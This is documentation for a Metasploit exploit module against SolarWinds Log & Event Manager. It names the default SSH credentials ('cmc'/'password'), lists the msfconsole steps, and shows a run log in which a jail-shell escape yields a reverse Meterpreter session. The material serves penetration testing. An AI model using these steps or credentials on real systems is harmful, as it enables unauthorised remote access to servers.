## Vulnerable Application

This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Vulnerable application can be download as a free trial from vendor webpage.
[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager)

## Verification Steps

  1. Start msfconsole
  2. Do: `use exploit/linux/ssh/solarwinds_lem_exec`
  3. Do: `set rhost <ip>`
  4. Do: `set lhost <ip>`
  5. Do: `exploit`
  6. You should get a shell.

## Scenarios

This is a run against a known vulnerable Solarwinds LEM server.
```
msf exploit(solarwind_lem_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.

msf exploit(solarwind_lem_exec) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: cmc
meterpreter > 
```

